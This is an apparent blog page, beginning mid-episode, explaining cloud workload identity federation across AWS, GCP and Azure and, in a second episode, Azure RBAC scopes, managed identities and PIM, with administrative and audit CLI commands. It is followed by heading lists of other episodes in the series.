  --name my-aks --resource-group rg-prod \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# Create a user-assigned managed identity for the workload
az identity create --name app-backend-identity --resource-group rg-identities
CLIENT_ID=$(az identity show --name app-backend-identity -g rg-identities --query clientId -o tsv)
PRINCIPAL_ID=$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)

# Grant the identity the access it needs
az role assignment create \
  --assignee-object-id "$PRINCIPAL_ID" \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Federate: trust the K8s service account from this cluster
az identity federated-credential create \
  --name aks-app-backend-binding \
  --identity-name app-backend-identity \
  --resource-group rg-identities \
  --issuer "${OIDC_ISSUER}" \
  --subject "system:serviceaccount:production:app-backend" \
  --audience "api://AzureADTokenExchange"

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "CLIENT_ID_HERE"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"   # triggers token injection
spec:
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest
    # Azure SDK DefaultAzureCredential picks up the injected token automatically

Cross-Cloud Federation — When AWS Talks to GCP

The same OIDC mechanism works cross-cloud. An AWS Lambda or EC2 instance can call GCP APIs without any GCP service account key on the AWS side:

# GCP side: create a workload identity pool that trusts AWS
gcloud iam workload-identity-pools create "aws-workloads" --location=global

gcloud iam workload-identity-pools providers create-aws "aws-provider" \
  --workload-identity-pool="aws-workloads" \
  --account-id="AWS_ACCOUNT_ID"

# Bind the specific AWS role to the GCP service account
gcloud iam service-accounts add-iam-policy-binding [email protected] \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/GCP_PROJ_NUM/locations/global/workloadIdentityPools/aws-workloads/attribute.aws_role/arn:aws:sts::AWS_ACCOUNT:assumed-role/MyAWSRole"

The AWS workload presents its STS-issued credentials to GCP’s token exchange endpoint. GCP verifies the AWS signature, checks the attribute mapping (only MyAWSRole from that AWS account), and issues a short-lived GCP access token. No GCP service account key is ever distributed to the AWS side.

The Threat Model — What Workload Identity Doesn’t Solve

Workload identity dramatically reduces the attack surface, but it doesn’t eliminate it:

Threat	What Still Applies	Mitigation
Token theft from the container filesystem	The projected token is readable if you have container filesystem access	Short TTL (default 1h); tokens are audience-bound — can’t use a K8s token to call Azure APIs
SSRF to metadata service	An SSRF vulnerability can fetch credentials from the metadata endpoint	Enforce IMDSv2 on AWS; use metadata server restrictions on GKE/AKS
Overpermissioned service account	Workload identity doesn’t enforce least privilege — the SA can still be over-granted	One SA per workload; review permissions against actual usage
Trust policy too broad	OIDC trust policy allows any service account in a namespace	Always pin to specific SA name in the `sub` condition

The SSRF-to-metadata-service path deserves particular attention. IMDSv2 (mandatory in AWS by requiring a PUT to get a token before any metadata request) blocks most SSRF scenarios because a simple SSRF can only make GET requests. Enforce it:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP — no instance can launch without IMDSv2
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {
      "ec2:MetadataHttpTokens": "required"
    }
  }
}

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — Trust policy scoped to namespace, not service account ║
║                                                                      ║
║  A condition like "sub": "system:serviceaccount:production:*"        ║
║  grants any pod in the production namespace the ability to assume    ║
║  the role. A compromised or new workload in that namespace gets      ║
║  access automatically.                                               ║
║                                                                      ║
║  Fix: always pin the sub condition to the exact service account      ║
║  name. "system:serviceaccount:production:app-backend" — not a glob.  ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Shared service accounts across workloads             ║
║                                                                      ║
║  Reusing one service account for multiple workloads saves setup      ║
║  time and creates a lateral movement path. A compromised workload    ║
║  that shares a service account with a payment processor has payment  ║
║  processor permissions.                                              ║
║                                                                      ║
║  Fix: one service account per workload. The overhead is low.         ║
║  The blast radius reduction is significant.                          ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — IMDSv1 still reachable after enabling IMDSv2        ║
║                                                                      ║
║  Enabling IMDSv2 on new instances doesn't affect existing ones.      ║
║  The SCP approach enforces it at the org level going forward, but    ║
║  existing instances need explicit remediation.                       ║
║                                                                      ║
║  Fix: audit existing instances for IMDSv1 exposure.                 ║
║  aws ec2 describe-instances --query                                  ║
║    "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']║
║    .[InstanceId,Tags]"                                               ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌────────────────────────────────┬───────────────────────────────────────────────────────┐
│ Term                           │ What it means                                         │
├────────────────────────────────┼───────────────────────────────────────────────────────┤
│ Workload identity federation   │ OIDC-based exchange: runtime JWT → short-lived token  │
│ IRSA                           │ IAM Roles for Service Accounts — EKS + OIDC pattern   │
│ EKS Pod Identity               │ Newer, simpler IRSA replacement — no OIDC setup       │
│ GKE Workload Identity          │ K8s SA → GCP SA via workload pool + IAM binding       │
│ AKS Workload Identity          │ K8s SA → managed identity via federated credential    │
│ IAM Roles Anywhere             │ AWS temp credentials for on-prem via X.509 cert       │
│ IMDSv2                         │ Token-gated AWS metadata service — blocks SSRF        │
│ OIDC sub claim                 │ Workload's unique identity string — use for pinning   │
│ Projected service account token│ K8s-injected JWT — the OIDC token pods present to AWS │
└────────────────────────────────┴───────────────────────────────────────────────────────┘

Key commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — list OIDC providers registered in this account                               │
│  aws iam list-open-id-connect-providers                                               │
│                                                                                        │
│  # AWS — list Pod Identity associations for a cluster                                 │
│  aws eks list-pod-identity-associations --cluster-name my-cluster                     │
│                                                                                        │
│  # AWS — verify what credentials a pod is actually using                              │
│  aws sts get-caller-identity   # run from inside the pod                              │
│                                                                                        │
│  # AWS — audit instances missing IMDSv2                                               │
│  aws ec2 describe-instances \                                                          │
│    --query "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']          │
│    .[InstanceId]" --output text                                                        │
│                                                                                        │
│  # GCP — verify workload identity binding on a GCP service account                   │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL                                  │
│                                                                                        │
│  # GCP — list workload identity pools                                                 │
│  gcloud iam workload-identity-pools list --location=global                            │
│                                                                                        │
│  # Azure — list federated credentials on a managed identity                           │
│  az identity federated-credential list \                                               │
│    --identity-name app-backend-identity --resource-group rg-identities                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	Non-human identities dominate cloud environments; workload identity federation is the modern machine authentication pattern
CISSP	Domain 1 — Security & Risk Management	Static credential sprawl is a measurable, eliminable risk; workload identity removes it at the root
ISO 27001:2022	5.17 Authentication information	Managing machine credentials — workload identity replaces long-lived secrets with short-lived, environment-bound tokens
ISO 27001:2022	8.5 Secure authentication	OIDC token exchange is the secure authentication mechanism for machine identities
ISO 27001:2022	5.18 Access rights	Service account provisioning and deprovisioning — workload identity ties access to the runtime environment, not a stored secret
SOC 2	CC6.1	Workload identity federation is the preferred technical control for machine-to-cloud authentication in CC6.1
SOC 2	CC6.7	Short-lived, audience-bound tokens restrict credential reuse across systems — addresses transmission and access controls

Key Takeaways

Static credentials for machine identities are the problem, not the solution — workload identity federation eliminates them at the root
The OIDC token exchange pattern is consistent across AWS (IRSA/Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, the others are a translation
AWS EKS: use Pod Identity for new clusters; IRSA remains the pattern for existing ones — both eliminate static keys
GCP GKE: Workload Identity enabled at cluster level, SA annotation at the K8s service account level
Azure AKS: federated credential on the managed identity, azure.workload.identity/use: "true" label on pods
Cross-cloud federation works — an AWS IAM role can call GCP APIs without a GCP key file
Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; apply least privilege to the underlying cloud identity

What’s Next

You’ve eliminated the static credential problem. The next question is: what happens when the IAM configuration itself is the vulnerability? AWS IAM privilege escalation goes into the attack paths — how iam:PassRole, iam:CreateAccessKey, and misconfigured trust policies turn IAM misconfigurations into full account compromise. If you’re designing or auditing cloud access control, you need to know these paths before an attacker finds them.

Next: AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

Azure RBAC Explained: Management Groups, Subscriptions, and Scope

May 10, 2026April 16, 2026 by Vamshi Krishna Santhapuri

Reading Time: 11 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes

TL;DR

Entra ID and Azure RBAC are two separate authorization planes — Entra ID roles control the identity system; RBAC roles control Azure resources. Global Administrator doesn’t grant VM access.
Azure RBAC role assignments inherit downward through the hierarchy: Management Group → Subscription → Resource Group → Resource
Use managed identities for all Azure-hosted workloads — system-assigned for one-to-one resource binding, user-assigned for shared access across multiple resources
Contributor is the right role for most service identities — full resource management without the ability to modify RBAC assignments
The Actions vs DataActions split means you can audit management access and data access independently — an incomplete audit checks only one
PIM (Privileged Identity Management) should govern all Entra ID privileged roles — nobody should permanently hold Global Admin or Subscription Owner

The Big Picture

         Azure: Two Separate Authorization Planes
─────────────────────────────────────────────────────────
  Entra ID (Identity Plane)      Azure RBAC (Resource Plane)
  ─────────────────────────      ───────────────────────────
  Controls:                      Controls:
  · Users, groups, apps          · Azure resources
  · Tenant settings              · Management groups
  · App registrations            · Subscriptions
  · Conditional access           · Resource groups
                                 · Individual resources

  Roles (examples):              Scope hierarchy:
  · Global Administrator         Management Group
  · User Administrator             └─ Subscription
  · Security Reader                     └─ Resource Group
  · Application Administrator                └─ Resource

  Scope: tenant-wide             Role assignment at any level
                                 inherits down to all nodes below

  Both planes use Entra ID identities.
  Authorization in each plane is completely independent.
  Global Admin ≠ Subscription Owner.

Azure RBAC scopes determine how far a role assignment reaches — and the blast radius of a misconfiguration scales directly with how high in the hierarchy it sits.

Introduction

Azure RBAC scopes define where a role assignment applies and everything it inherits. A role at the Management Group level touches every subscription, every resource group, and every resource across your entire Azure estate. A role at the resource level touches only that resource. Understanding scope before making any assignment is the difference between “access for this storage account” and “access for your entire org.”

When I first worked seriously in Azure environments, I had a mental model carried over from Active Directory administration. Users, groups, directory roles — I knew how that worked. I assumed Azure’s IAM would be an extension of the same system, just with cloud resources bolted on.

That assumption got me into trouble within the first week.

I was trying to understand why an engineer had Global Administrator access in Entra ID but couldn’t see the resources in a Subscription. In Active Directory terms, if you’re a Domain Admin, you can see everything. In Azure, it doesn’t work that way.

Entra ID roles and Azure RBAC roles are two different systems. Global Administrator is an Entra ID role — it controls who can manage the identity plane: create users, manage app registrations, configure tenant settings. It has nothing to do with Azure resources like virtual machines, storage accounts, or Kubernetes clusters. Those are governed by Azure RBAC, which is an entirely separate authorization system.

I spent two hours trying to understand why a Global Admin couldn’t list VMs before someone explained this. I’m putting it at the top of this episode so you don’t lose those two hours.

Entra ID vs Azure RBAC — The Two Separate Planes

	Entra ID	Azure RBAC
Controls access to	Entra ID itself — users, groups, apps, tenant settings	Azure resources — VMs, storage, databases, subscriptions
Role types	Entra ID directory roles	Azure resource roles
Example roles	Global Admin, User Admin, Security Reader	Owner, Contributor, Storage Blob Data Reader
Scope	Tenant-wide	Management group → Subscription → Resource Group → Resource
Managed via	Entra ID admin center	Azure portal / ARM / Azure CLI

A user can be Global Administrator — the highest Entra ID role — and have zero access to Azure resources unless explicitly assigned an Azure RBAC role. And vice versa: a user with Subscription Owner (highest Azure RBAC role) has no ability to manage Entra ID user accounts without an Entra ID role assignment.

These are not the same system. They’re connected — both use Entra ID identities as principals — but authorization in each plane is independent.

The Azure Resource Hierarchy

Azure RBAC role assignments can be made at any level of the resource hierarchy, and they inherit downward:

Tenant (Entra ID)
  └── Management Group  (policy and RBAC inheritance across subscriptions)
        └── Management Group  (nested, up to 6 levels)
              └── Subscription  (billing and resource boundary)
                    └── Resource Group  (logical container for resources)
                          └── Resource  (VM, storage account, key vault, AKS cluster...)

A role assigned at the Subscription level applies to every resource group and resource in that subscription. A role at the Management Group level applies to every subscription beneath it.

The blast radius of a misconfiguration scales with how high in the hierarchy it sits. Subscription Owner at the subscription level is contained to that subscription. Management Group Contributor at the root management group touches your entire Azure estate.

# View management group hierarchy
az account management-group list --output table

# List subscriptions
az account list --output table

# View all role assignments at a scope — start here in any audit
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --include-inherited \
  --output table

Principal Types in Azure RBAC

Type	What It Is	Best For
User	Entra ID user account	Human access
Group	Entra ID security group	Team-based access
Service Principal	App registration with credentials (secret or cert)	External systems, apps with their own identity
Managed Identity	Credential-less identity for Azure-hosted workloads	Everything running in Azure

Managed Identities — The Right Model for Workloads

Managed identities are Azure’s answer to AWS instance profiles and GCP service accounts attached to compute. Azure manages the entire credential lifecycle — tokens are issued automatically, there’s nothing to create, rotate, or revoke manually.

System-assigned managed identity is tied to a specific Azure resource. When the resource is deleted, the identity is deleted. One-to-one, no sharing.

# Enable system-assigned managed identity on a VM
az vm identity assign \
  --name my-vm \
  --resource-group rg-prod

# Get the principal ID (needed to assign RBAC roles to it)
az vm show \
  --name my-vm \
  --resource-group rg-prod \
  --query identity.principalId \
  --output tsv

User-assigned managed identity is a standalone resource that can be attached to multiple Azure resources and persists independently. This is the right model when multiple services need the same access — instead of assigning the same RBAC roles to ten separate system-assigned identities, you create one user-assigned identity, grant it the roles, and attach it to all ten resources.

# Create a user-assigned managed identity
az identity create \
  --name app-backend-identity \
  --resource-group rg-identities

# Get its identifiers
az identity show \
  --name app-backend-identity \
  --resource-group rg-identities \
  --query '{principalId:principalId, clientId:clientId}'

# Attach to a VM
az vm identity assign \
  --name my-vm \
  --resource-group rg-prod \
  --identities /subscriptions/SUB/resourceGroups/rg-identities/providers/Microsoft.ManagedIdentity/userAssignedIdentities/app-backend-identity

Code running inside an Azure VM or App Service with a managed identity gets tokens via IMDS, with no credential management required:

from azure.identity import DefaultAzureCredential
from azure.storage.blob import BlobServiceClient

# DefaultAzureCredential automatically picks up the managed identity in Azure
credential = DefaultAzureCredential()
client = BlobServiceClient(
    account_url="https://myaccount.blob.core.windows.net",
    credential=credential
)

The DefaultAzureCredential chain: managed identity → environment variables → workload identity → Visual Studio / VS Code authentication → Azure CLI. In Azure-hosted services, the managed identity path is used automatically. In local development, it falls through to the developer’s az login session.

Azure Role Definitions — Understanding Actions vs DataActions

A role definition specifies what actions it grants. Azure distinguishes two planes:

Actions: Control plane — managing the resource itself (create, delete, configure)
DataActions: Data plane — accessing data within the resource (read blob contents, get secrets)
NotActions / NotDataActions: Exceptions carved out from the grant

{
  "Name": "Storage Blob Data Reader",
  "IsCustom": false,
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read",
    "Microsoft.Storage/storageAccounts/blobServices/generateUserDelegationKey/action"
  ],
  "NotActions": [],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "NotDataActions": [],
  "AssignableScopes": ["/"]
}

The control/data plane split matters in audits. An identity with Microsoft.Storage/storageAccounts/read (an Action) can see the storage account exists and view its properties. To actually read blob contents, it needs the DataAction Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read. These are separate grants. In an access audit, checking only Actions and missing DataActions is an incomplete picture.

Built-in Roles Worth Understanding

Role	Scope	What It Grants
Owner	Any	Full access + can manage RBAC assignments — the highest trust role
Contributor	Any	Full resource management, but cannot manage RBAC
Reader	Any	Read-only on all resources
User Access Administrator	Any	Can manage RBAC assignments, no resource access
Storage Blob Data Contributor	Storage	Read/write/delete blob data
Storage Blob Data Reader	Storage	Read blob data only
Key Vault Secrets Officer	Key Vault	Manage secrets, not keys or certificates
AcrPush / AcrPull	Container Registry	Push or pull images

The gap between Owner and Contributor is important: Contributor can do everything to a resource except manage who has access to it. This is the right role for most service identities and automation — they need to manage resources, not manage permissions. If a compromised Contributor identity can’t modify RBAC assignments, it can’t grant itself or an attacker additional access.

Owner should be granted to people, not service identities, and only at the narrowest scope necessary.

Custom Roles

cat > custom-app-storage.json << 'EOF'
{
  "Name": "App Storage Blob Reader",
  "IsCustom": true,
  "Description": "Read app blobs only — no container management, no key operations",
  "Actions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/read"
  ],
  "DataActions": [
    "Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read"
  ],
  "NotActions": [],
  "NotDataActions": [],
  "AssignableScopes": ["/subscriptions/SUB_ID"]
}
EOF

az role definition create --role-definition custom-app-storage.json

# Assign it — specifically to this storage account
az role assignment create \
  --assignee-object-id "$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)" \
  --assignee-principal-type ServicePrincipal \
  --role "App Storage Blob Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

Role Assignments — Where Access Is Actually Granted

The assignment brings everything together: principal + role + scope. This is the actual grant.

# Assign to a user (less common — prefer group assignments)
az role assignment create \
  --assignee [email protected] \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/prodstore

# Assign to a group (better — one assignment, maintained via group membership)
GROUP_ID=$(az ad group show --group "Backend-Team" --query id -o tsv)
az role assignment create \
  --assignee-object-id "$GROUP_ID" \
  --assignee-principal-type Group \
  --role "Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-dev

# Assign to a managed identity
MI_PRINCIPAL=$(az identity show --name app-backend-identity --resource-group rg-identities --query principalId -o tsv)
az role assignment create \
  --assignee-object-id "$MI_PRINCIPAL" \
  --assignee-principal-type ServicePrincipal \
  --role "Storage Blob Data Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Audit all assignments at and below a scope (including inherited)
az role assignment list \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod \
  --include-inherited \
  --output table

Group-based assignments are the right model for humans at scale. When an engineer joins the Backend team, they join the Entra ID group. Their access follows. When they leave, you remove them from the group or disable their account. You never need to hunt down individual role assignments.

Entra ID Roles — The Other Layer

Entra ID roles control the identity infrastructure itself. These are distinct from Azure RBAC roles and deserve separate treatment:

Role	What It Controls
Global Administrator	Everything in the tenant — highest privilege
Privileged Role Administrator	Assign and remove Entra ID roles
User Administrator	Create and manage users and groups
Application Administrator	Register and manage app registrations
Security Administrator	Manage security features and read reports
Security Reader	Read-only on security features

Global Administrator in Entra ID is one of the most powerful identities in a Microsoft environment. It can modify any user, any app registration, any conditional access policy. Combined with the fact that Entra ID is also the identity provider for Microsoft 365, a Global Admin compromise can extend far beyond Azure resources into email, Teams, SharePoint — the entire Microsoft 365 estate.

Nobody should hold Global Administrator as a permanent assignment. This is where Privileged Identity Management (PIM) matters.

Privileged Identity Management — Just-in-Time Elevated Access

PIM is Azure’s answer to the problem of permanent privileged role assignments. Instead of permanently holding Global Admin or Subscription Owner, users are made eligible for these roles. When they need elevated access, they activate it with a justification (and optionally an approval and MFA requirement). The access is time-limited — typically 8 hours — and automatically expires.

# List roles where the user is eligible (not permanently assigned)
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilitySchedules" \
  --query "value[?principalId=='USER_OBJECT_ID']"

# A user activates an eligible role (calls this themselves when needed)
az rest --method POST \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --body '{
    "action": "selfActivate",
    "principalId": "USER_OBJECT_ID",
    "roleDefinitionId": "ROLE_DEF_ID",
    "directoryScopeId": "/",
    "justification": "Investigating security alert in tenant audit logs",
    "scheduleInfo": {
      "startDateTime": "2026-04-16T00:00:00Z",
      "expiration": { "type": "AfterDuration", "duration": "PT8H" }
    }
  }'

PIM is the right model for any role that could be used to escalate privileges: Global Administrator, Subscription Owner, Privileged Role Administrator, User Access Administrator. Nobody should have these permanently assigned unless there’s a strong operational reason — and even then, the assignment should be reviewed quarterly.

In one Azure environment I audited, I found 11 permanent Global Administrator assignments. The team thought this was normal because they’d all been made admins when the tenant was set up two years earlier and nobody had revisited it. Of the 11, three were former employees whose Entra ID accounts had been disabled — but the Global Admin role assignment was still there. Disabled users can’t use their accounts, but this is not a pattern you want to rely on.

Federated Identity for External Workloads

For GitHub Actions, Kubernetes workloads, and other external systems that need to call Azure APIs, federated credentials eliminate service principal secrets:

# Create an app registration
APP_ID=$(az ad app create --display-name "github-actions-deploy" --query appId -o tsv)
SP_ID=$(az ad sp create --id "$APP_ID" --query id -o tsv)

# Add a federated credential for a specific GitHub repo and branch
az ad app federated-credential create \
  --id "$APP_ID" \
  --parameters '{
    "name": "github-main-branch",
    "issuer": "https://token.actions.githubusercontent.com",
    "subject": "repo:my-org/my-repo:ref:refs/heads/main",
    "audiences": ["api://AzureADTokenExchange"]
  }'

# Grant the service principal an RBAC role
az role assignment create \
  --assignee-object-id "$SP_ID" \
  --role "Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod

GitHub Actions — no secrets stored in GitHub:

jobs:
  deploy:
    permissions:
      id-token: write   # required for OIDC token request
    steps:
      - uses: azure/login@v2
        with:
          client-id: ${{ secrets.AZURE_CLIENT_ID }}
          tenant-id: ${{ secrets.AZURE_TENANT_ID }}
          subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }}
      - run: az storage blob upload --account-name prodstore ...

The client-id, tenant-id, and subscription-id values are not secrets — they’re identifiers. The actual authentication is the OIDC JWT from GitHub, verified against GitHub’s public keys, subject-matched against the configured condition (repo:my-org/my-repo:ref:refs/heads/main). If the repo or branch doesn’t match, the token exchange fails. If it matches, a short-lived Azure token is issued.

⚠ Production Gotchas

Global Admin ≠ Azure resource access
This trips up every team migrating from on-prem AD. Entra ID roles and Azure RBAC roles are independent systems. A Global Admin with no RBAC assignments cannot list VMs. Don’t assume directory privilege translates to resource access.

Permanent Global Admin assignments are a standing breach risk
In the environment I audited: 11 permanent Global Admins, three of them disabled accounts. Disabled accounts can’t authenticate, but relying on that is not a security control. PIM eligible assignments + regular access reviews is the right answer.

Owner on service identities lets compromised workloads modify RBAC
If a managed identity or service principal holds Owner, a compromised workload can grant additional permissions to itself or an attacker. Use Contributor for workloads — full resource management, no RBAC modification.

Checking only Actions misses data-plane access
An audit that enumerates role Actions and ignores DataActions will miss identities with read access to blob contents, Key Vault secrets, or database records. Both planes need to be in scope.

System-assigned identity is deleted with the resource
If you delete and recreate a VM using a system-assigned identity, the new identity is different. Any RBAC assignments made to the old identity are gone. User-assigned identities persist independently — use them for workloads where the resource lifecycle is separate from the identity lifecycle.

Quick Reference

# Audit all role assignments at a subscription (including inherited)
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --include-inherited \
  --output table

# Find all Owner assignments at subscription scope
az role assignment list \
  --scope /subscriptions/SUB_ID \
  --role Owner \
  --output table

# Get principal ID of a VM's managed identity
az vm show \
  --name my-vm \
  --resource-group rg-prod \
  --query identity.principalId \
  --output tsv

# View role definition — check Actions AND DataActions
az role definition list --name "Storage Blob Data Reader" --output json \
  | jq '.[0] | {Actions: .permissions[0].actions, DataActions: .permissions[0].dataActions}'

# List management group hierarchy
az account management-group list --output table

# Create user-assigned managed identity
az identity create --name app-identity --resource-group rg-identities

# Assign role to managed identity at resource scope
az role assignment create \
  --assignee-object-id "$(az identity show -n app-identity -g rg-identities --query principalId -o tsv)" \
  --assignee-principal-type ServicePrincipal \
  --role "Storage Blob Data Contributor" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/mystore

# Check PIM eligible roles for a user
az rest --method GET \
  --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilitySchedules" \
  --query "value[?principalId=='USER_OBJECT_ID'].{role:roleDefinitionId,scope:directoryScopeId}"

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 5 — Identity and Access Management	Azure’s directory-centric model; managed identities and PIM are the primary IAM constructs
CISSP	Domain 3 — Security Architecture	Entra ID spans Azure, M365, and third-party SaaS — scope boundaries determine the blast radius of a compromise
ISO 27001:2022	5.15 Access control	Azure RBAC role definitions and assignments implement access control policy
ISO 27001:2022	5.16 Identity management	Entra ID is the identity management platform — user lifecycle, group management, application registrations
ISO 27001:2022	8.2 Privileged access rights	PIM (Privileged Identity Management) directly implements JIT controls for privileged roles
ISO 27001:2022	5.18 Access rights	Role assignment scoping, managed identity provisioning, federated credential lifecycle
SOC 2	CC6.1	Managed identities and RBAC are the primary technical controls for CC6.1 in Azure-hosted environments
SOC 2	CC6.3	PIM activation expiry and access reviews directly satisfy time-bound access removal requirements

Key Takeaways

Entra ID and Azure RBAC are separate authorization planes — Entra ID roles control the identity system; RBAC roles control Azure resources. Global Administrator doesn’t grant VM access.
Use managed identities for all Azure-hosted workloads — system-assigned for one-to-one, user-assigned for shared identities across multiple resources
Contributor is the right role for most service identities — full resource management without RBAC modification ability
The control/data plane split (Actions vs DataActions) in role definitions means you can grant management access without data access or vice versa — use this
PIM should govern all Entra ID privileged roles and high-scope Azure roles — nobody should permanently hold Global Admin or Subscription Owner
Federated identity credentials replace service principal secrets for external workloads — no secrets stored in CI/CD systems

What’s Next

EP07 goes cross-cloud: workload identity federation — the shift away from static credentials entirely, with IRSA for EKS, GKE Workload Identity, AKS workload identity, and GitHub Actions-to-all-three-clouds patterns.

Next: OIDC Workload Identity — Eliminate Cloud Access Keys Entirely.

Get EP07 in your inbox when it publishes → subscribe

TL;DR

The Big Picture

Why These Breaches Are the Curriculum

December 2020: SolarWinds — Supply Chain at Scale

December 2021: Log4Shell — Injection in a Logging Library

September 2022: Uber — MFA Fatigue Meets Hardcoded Credentials

January 2023: CircleCI — Session Token Theft and Secret Exfiltration

October 2023: Okta — Support System Compromise

April 2024: XZ Utils — Two Years of Social Engineering

The Three Root Causes: A Framework for Your Exercise Backlog

Run This in Your Own Environment: Breach Scenario Self-Assessment

⚠ Common Mistakes When Using Breach History as a Training Resource

Quick Reference

Key Takeaways

What’s Next

TL;DR

The Big Picture

Why Engineers Treat OWASP as a Web-App-Only Concern

A01: Broken Access Control — IAM Wildcards and Public S3

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

A03: Injection — Log4Shell and SSRF as Injection Variants

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

A08: Software and Data Integrity Failures — Compromised Build Pipelines

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

The Series Attack Map: Which Episodes Cover Which Categories

Run This in Your Own Environment: OWASP Coverage Self-Assessment

⚠ Common Mistakes When Mapping OWASP to Infrastructure

Quick Reference

Key Takeaways

What’s Next

TL;DR

The Big Picture: From /etc/passwd to Zero Trust

The Assumption That Zero Trust Rejects

Human Zero Trust: Continuous Verification

Workload Identity: The Non-Human Problem

SPIFFE: The Standard

SPIRE: The Runtime

mTLS: Both Sides Show ID

Open Policy Agent: Authorization After Identity

⚠ Common Misconceptions

Framework Alignment

Key Takeaways

TL;DR

The Big Picture: How Entra ID Linux Login Works

Entra ID vs Active Directory: What’s Different

Prerequisites

Configuration

The Login Flow

On an Azure VM (Integrated mode)

Username format on the Linux system

Conditional Access for Linux Logins

Role-Based Access: Who Can Log In

Debugging Entra ID Linux Logins

Entra ID Connect: Bringing On-Prem Users to Entra ID

⚠ Common Misconceptions

Framework Alignment

Key Takeaways

What’s Next

TL;DR

The Big Picture: The UEFI Secure Boot Trust Chain

What Secure Boot Actually Does — and Why Certificate Expiry Breaks Booting

The Three Certificates Expiring in 2026

1. Microsoft Corporation KEK CA 2011 — expires June 24, 2026

2. Microsoft Corporation UEFI CA 2011 — expires June 27, 2026

3. Microsoft Windows Production PCA 2011 — expires October 19, 2026

Why GCP Instances Are Specifically Affected

GKE Shielded Nodes: The Operational Blind Spot

Detecting Affected Resources

Compute Engine Instances

GKE Node Pools

Checking the UEFI DB on a Running Instance

Solutions

Option 1: Recreate Instances (Primary — Recommended by Google)

Option 2: Disable Secure Boot Temporarily (Emergency Workaround)

Option 3: Restore from Machine Image

vTPM, BitLocker, and Full Disk Encryption: The Hidden Risk